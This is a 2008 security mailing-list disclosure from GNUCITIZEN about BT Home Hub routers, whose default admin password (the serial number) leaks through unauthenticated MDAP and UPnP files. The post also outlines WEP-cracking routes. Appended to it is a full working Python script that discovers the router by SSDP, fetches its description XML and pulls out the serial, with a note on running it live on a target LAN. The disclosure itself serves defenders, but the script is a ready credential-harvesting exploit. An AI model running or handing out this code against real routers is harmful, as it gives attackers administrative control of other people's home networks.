Re: MDAP ANTs PWNAGE: dumping the admin password of the BT Home Hub
UPDATED:
The BT Home Hub's serial number - which is the default admin password
- can also be found in UPnP description XML files. Note that no
password is required to access such files, as they are used for UPnP
(authentication-less) operations, and that UPnP is enabled by default
on the BT Home Hub.
More information can be found on:
http://www.gnucitizen.org/blog/dumping-the-admin-password-of-the-bt-home-hub-pt-2/
On Wed, May 21, 2008 at 10:43 PM, Adrian Pastor <ap@xxxxxxxxxxxxxx> wrote:
> http://www.gnucitizen.org/blog/dumping-the-admin-password-of-the-bt-home-hub/
>
> We're back with more security attacks against the BT Home Hub (the
> most popular wireless DSL router in the UK)!
>
> BT added a new security feature on the latest version [1] of the BT
> Home Hub firmware (6.2.6.E at time of writing) which changes the
> default admin password from 'admin' to the serial number of the
> router. From BT Support and Advice [2] site:
>
> "Firmware 6.2.6.E introduces the following improvements: Change
> default Hub Manager access password from 'admin' to your unique Hub
> serial number"
>
> Well, it turns out that you can get the serial number of the Home Hub
> by simply sending a Multi Directory Access Protocol (MDAP) multicast
> request in the network where BT Home Hub is located. Yes, you must
> already be part of the LAN where the Home Hub is present, either via
> ethernet or via Wi-Fi. However, at GNUCITIZEN, we have demonstrated
> [3] trivial ways to predict the WEP encryption key of the Home Hub if
> you know what you are doing.
>
> In summary, there are two ways to break into a BT Home Hub Wi-Fi network:
>
> - ARP replay injection plus weak-IV cracking. This attack is
> typically launched using airodump-ng + aireplay-ng + aircrack-ng (I
> highly recommend using BackTrack 2 plus the Alfa USB AWUS036S Wi-Fi
> adaptor for this attack)
> - Predict the Home Hub's default WEP key by bruteforcing a list of
> potential candidates which are derived from the SSID (the SSID can be
> obtained by anyone of course)
>
> As promised in CONFidence [4], we're releasing the full details
> including PoC scripts:
> http://www.gnucitizen.org/blog/dumping-the-admin-password-of-the-bt-home-hub/
>
> In summary, there are currently about 3 million BT Home Hub routers in
> the UK whose default WEP key AND admin password can be easily
> predicted.
>
>
> ABOUT GNUCITIZEN
>
> GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think
> Tank, which primarily deals with all aspects of the art of hacking.
> Our work has been featured in established magazines and information
> portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and
> many others. The members of the GNUCITIZEN group are well known and
> well established experts in the Information Security, Black Public
> Relations (PR) Industries and Hacker Circles with widely recognized
> experience in the government and corporate sectors and the open source
> community.
>
>
> REFERENCES
>
> [1] "What is the latest version of BT Home Hub firmware?"
> http://snipurl.com/29w9o
>
> [2] "What changes are included in the latest BT Home Hub firmware?"
> http://snipurl.com/29oo4
>
> [3] "Default key algorithm in Thomson and BT Home Hub routers"
> http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/
>
> [4] "Cracking into embedded devices and beyond! - CONFidence, Krakow 2008"
> http://www.gnucitizen.org/projects/confidence-2008/Cracking%20into%20embedded%20devices%20-%20CONFidence%202K8.pdf
>
--
Adrian 'pagvac' Pastor | Security Consultant and White Hat Hacker | GNUCITIZEN
gnucitizen.com
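The UPnP route described in the update above, written out as an added example (this is not the GNUCITIZEN PoC script and not code from the original post). It does what the update says an attacker on the LAN can do: send an SSDP M-SEARCH to the standard multicast address, take the LOCATION header from the reply, GET the device description XML with no credentials, and read the serial number out of it. Assumptions: the serial is exposed in the standard UPnP `<serialNumber>` element (the post says only that it is in the description XML, not which element); the SSDP reply, the description XML, the address 192.168.1.254 and the serial `SN-EXAMPLE-0001` are constructed sample data so the parsing runs offline.

```python
"""Pull a router's serial number out of its unauthenticated UPnP description.

Added example, not the original post's PoC.  Assumes the serial is in the
standard UPnP <serialNumber> element; all sample data below is constructed.
"""
import socket
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional
from urllib.request import urlopen

SSDP_ADDR = ("239.255.255.250", 1900)          # standard SSDP multicast group
MSEARCH = (
    "M-SEARCH * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    'MAN: "ssdp:discover"\r\n'
    "MX: 2\r\n"
    "ST: upnp:rootdevice\r\n"
    "\r\n"
)

# Constructed SSDP reply: the address and path are placeholders.
SAMPLE_SSDP_REPLY = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"EXT:\r\n"
    b"LOCATION: http://192.168.1.254:80/upnp/IGD.xml\r\n"
    b"SERVER: Linux/2.4, UPnP/1.0\r\n"
    b"ST: upnp:rootdevice\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000000::upnp:rootdevice\r\n"
    b"\r\n"
)

# Constructed device description; the serial number is a made-up value.
SAMPLE_DESCRIPTION_XML = b"""<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
  <specVersion><major>1</major><minor>0</minor></specVersion>
  <device>
    <deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
    <friendlyName>Example Home Gateway</friendlyName>
    <manufacturer>Example Vendor</manufacturer>
    <modelName>Example Hub</modelName>
    <serialNumber>SN-EXAMPLE-0001</serialNumber>
    <deviceList>
      <device>
        <deviceType>urn:schemas-upnp-org:device:WANDevice:1</deviceType>
        <friendlyName>WANDevice</friendlyName>
      </device>
    </deviceList>
  </device>
</root>"""


def parse_ssdp_location(response: bytes) -> Optional[str]:
    """Return the LOCATION header of an SSDP 'HTTP/1.1 200 OK' reply, or None."""
    for line in response.decode("ascii", errors="replace").split("\r\n"):
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "location":
            return value.strip()
    return None


def extract_serial_numbers(description_xml: bytes) -> List[str]:
    """Return every <serialNumber> text in a UPnP device description.

    UPnP DA 1.0 places serialNumber under <device>; embedded devices under
    <deviceList> may carry their own.  Tag comparison ignores the XML
    namespace so vendor-specific or missing xmlns declarations still match.
    """
    root = ET.fromstring(description_xml)
    serials = []
    for elem in root.iter():
        if elem.tag.rsplit("}", 1)[-1] == "serialNumber" and elem.text:
            serials.append(elem.text.strip())
    return serials


def discover_serials(timeout: float = 3.0) -> Dict[str, List[str]]:
    """Live version: multicast M-SEARCH, GET each LOCATION, map URL -> serials.

    Requires LAN access (Ethernet or Wi-Fi) to the target; nothing here
    authenticates, which is exactly the point the post makes.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
    sock.settimeout(timeout)
    results: Dict[str, List[str]] = {}
    try:
        sock.sendto(MSEARCH.encode("ascii"), SSDP_ADDR)
        while True:
            data, _addr = sock.recvfrom(4096)
            location = parse_ssdp_location(data)
            if location and location not in results:
                with urlopen(location, timeout=timeout) as resp:  # no credentials
                    results[location] = extract_serial_numbers(resp.read())
    except socket.timeout:
        pass
    finally:
        sock.close()
    return results


if __name__ == "__main__":
    # Offline demonstration on the constructed data.
    print(parse_ssdp_location(SAMPLE_SSDP_REPLY))
    print(extract_serial_numbers(SAMPLE_DESCRIPTION_XML))
```

Run as a script it only parses the constructed sample; call `discover_serials()` from a host on the target LAN to perform the real multicast search. The namespace-insensitive tag match matters in practice because embedded-device descriptions do not always declare the UPnP namespace correctly.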